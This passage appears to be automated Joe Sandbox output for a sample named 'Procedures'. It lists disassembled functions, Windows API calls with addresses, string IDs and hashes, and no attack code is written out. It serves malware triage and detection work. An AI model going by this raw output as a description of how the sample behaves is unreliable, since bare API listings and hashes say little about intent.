                                                                                                                                                                                                                                                                                                    • Opcode ID: 829fff4aa223bb741d9ef04375db6e9bbab1c76d0d57874a00e337e921a29e98
                                                                                                                                                                                                                                                                                                    • Instruction ID: 80037425a70cdfe4975a1dbb4fc0c7d98086fe37ed80a3bd7ca9b3a13d1a63c1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 829fff4aa223bb741d9ef04375db6e9bbab1c76d0d57874a00e337e921a29e98
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81718E31900705AFDB20EFA9CE45BAEBBF5FF48704F101928E59AB25A0D775E944CB50
                                                                                                                                                                                                                                                                                                    Function 00EA086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00EA0884
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00EA088F
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EA089A
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00EA08A5
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00EA08B0
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00EA08BB
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00EA08C6
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00EA08D1
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00EA08DC
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00EA08E7
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00EA08F2
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00EA08FD
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00EA0908
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00EA0913
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00EA091E
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00EA0929
                                                                                                                                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00EA0939
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EA097B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c61d114ac659271d0e84e9a4c7822d8dc2180fe00b796f146a9e27f79b7cfee8
                                                                                                                                                                                                                                                                                                    • Instruction ID: e827d6c817cc012fafcb0896a7857603b52824a104818b5709b75bf9e081f7f2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c61d114ac659271d0e84e9a4c7822d8dc2180fe00b796f146a9e27f79b7cfee8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5413370D083196ADB109FBA8C8985FBFE8FF48754B50452AA158FB291DA78A901CF91
                                                                                                                                                                                                                                                                                                    Function 00E83A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-2171760788
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8842a277dff8b4ea24604a74d655c5e9aae710e8facad28271388548fbe6feea
                                                                                                                                                                                                                                                                                                    • Instruction ID: 794b347e3c3ecbdacac2198dd6ed3e9e2779cc83d7c2878b870614f4f3906a9d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8842a277dff8b4ea24604a74d655c5e9aae710e8facad28271388548fbe6feea
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE1E432E00616ABCB18AFB4C8417EEFBB5BF54B54F146129E45EF7250EB30AE458790
                                                                                                                                                                                                                                                                                                    Function 00EB9B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00EB9BA3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB80AE: ClientToScreen.USER32(?,?), ref: 00EB80D4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB80AE: GetWindowRect.USER32(?,?), ref: 00EB814A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EB80AE: PtInRect.USER32(?,?,?), ref: 00EB815A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EB9C0C
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EB9C17
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EB9C3A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EB9C81
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EB9C9A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EB9CB1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EB9CD3
                                                                                                                                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 00EB9CDA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00EB9DCD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
                                                                                                                                                                                                                                                                                                    • API String ID: 221274066-1080139498
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4b4fa4484a67b23e82374c8fc2c7dcc51eaa4123b8c0dd5aabb8dcc9f2ad5508
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6d1956f9cb1202366bf37a2237d33906574fe367579ffa7e9cf650ddcd2a3cd2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b4fa4484a67b23e82374c8fc2c7dcc51eaa4123b8c0dd5aabb8dcc9f2ad5508
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10617971108315AFC705EF61DC85DAFBBE8EFC8750F001A1EF691A22A1DB709A49CB52
                                                                                                                                                                                                                                                                                                    Function 00E40436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E40436
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00EF170C,00000FA0,CBF75EA1,?,?,?,?,00E62733,000000FF), ref: 00E4048C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E62733,000000FF), ref: 00E40497
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E62733,000000FF), ref: 00E404A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E404BE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E404CC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E404DA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E40505
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E40510
                                                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00E40457
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40413: __onexit.LIBCMT ref: 00E40419
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E40492
                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable, xrefs: 00E404B8
                                                                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00E404D2
                                                                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 00E404A3
                                                                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00E404C4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                    • Opcode ID: b80b87823d7166340f38056c47f3f04b635b25f9b54943d424c28353458d5ca7
                                                                                                                                                                                                                                                                                                    • Instruction ID: c6c857a63d2c9ea0ea233f47ef779af26f2df78bc3cd38e83e5c0f6fd753bf2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80b87823d7166340f38056c47f3f04b635b25f9b54943d424c28353458d5ca7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F210E32A45708AFD7206BA5BC45F6A37D4DB45B65F001239FB15F72C0EF749C058951
                                                                                                                                                                                                                                                                                                    Function 00E94F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00EBDCD0), ref: 00E94F6C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E94F80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E94FDE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E95039
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E95084
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E950EC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FD52: _wcslen.LIBCMT ref: 00E3FD5D
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00EE7C10,00000061), ref: 00E95188
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0882c747847afc546c1b36323d8dc586a35987486833479ee8140891cb07d947
                                                                                                                                                                                                                                                                                                    • Instruction ID: 33a0a3bc0d73853c8c552e0040edf0e15b808e672e0734274df18b0b864aa16c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0882c747847afc546c1b36323d8dc586a35987486833479ee8140891cb07d947
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FB12472609B029FCB10EF29D890A6FB7E5BF94724F10691DF496A7291DB30DC44CB92
                                                                                                                                                                                                                                                                                                    Function 00EABA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABBF8
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC10
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC34
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABC60
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC74
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC96
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABD92
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E90F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E90F6D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABDAB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABDC6
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EABE16
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00EABE67
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EABE99
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EABEAA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EABEBC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EABECE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EABF43
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7f20b0d37d527f3cbcabc44de72cbe9089a0b3b0dc427fa39687d7c9a531fe5c
                                                                                                                                                                                                                                                                                                    • Instruction ID: fa27c5c51629736ad9a449f50d7a061eea50507a4e3e60d7ba57eefabbbda800
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f20b0d37d527f3cbcabc44de72cbe9089a0b3b0dc427fa39687d7c9a531fe5c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF1D1716083009FCB14EF24D891B6ABBE5BF89314F18955DF489AF2A2DB31EC45CB52
                                                                                                                                                                                                                                                                                                    Function 00EA4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EBDCD0), ref: 00EA4B18
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EA4B2A
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00EBDCD0), ref: 00EA4B4F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00EBDCD0), ref: 00EA4B9B
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00EBDCD0), ref: 00EA4C05
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00EA4CBF
                                                                                                                                                                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EA4D25
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00EA4D4F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                    • Opcode ID: 695d4b262f7eddf7f32450609dab39e0fea5f6c6ee9d8d5ba57639dbae4daf2a
                                                                                                                                                                                                                                                                                                    • Instruction ID: ba66f2f56619489f9904a581b887342f8772c91c68ea1a51945eccd2bcd07fd5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 695d4b262f7eddf7f32450609dab39e0fea5f6c6ee9d8d5ba57639dbae4daf2a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18124CB5A00115EFDB14DF54C884EAAB7B5FF89318F149098E809AF291D7B1FD46CBA0
                                                                                                                                                                                                                                                                                                    Function 00E2381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00EF29C0), ref: 00E63F72
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00EF29C0), ref: 00E64022
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00E64066
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00E6406F
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00EF29C0,00000000,?,00000000,00000000,00000000), ref: 00E64082
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E6408E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 13d2f9e45d37046d18ff7e57198bbb5f6d13ff3c61a1927f8bf504a1305b54d0
                                                                                                                                                                                                                                                                                                    • Instruction ID: d8f816e9d9abf57d1abb68e85dcddc9054d1ed0e2f4a60efa3f34bf0b27e4aa5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d2f9e45d37046d18ff7e57198bbb5f6d13ff3c61a1927f8bf504a1305b54d0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C710670644215BEEB259F39EC49FEABFA4FF053A8F201216F6247A1D1C771A910DB50
                                                                                                                                                                                                                                                                                                    Function 00EB7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00EB7823
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EB7897
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EB78B9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB78CC
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00EB78ED
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E20000,00000000), ref: 00EB791C
